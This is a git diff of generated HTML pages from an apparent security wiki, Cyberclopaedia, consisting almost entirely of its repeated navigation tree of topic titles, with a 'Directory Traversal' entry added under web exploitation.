      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/Time-Based One-Time Passwords (TOTP).html b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/Time-Based One-Time Passwords (TOTP).html index 3d086057..d1772133 100644 --- a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/Time-Based One-Time Passwords (TOTP).html +++ b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/Time-Based One-Time Passwords (TOTP).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/index.html b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/index.html index 26bc2761..97f0aa46 100644 --- a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/index.html +++ b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -235,22 +235,6 @@

Replay Attacks< - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html index e1c38dbc..80495a07 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
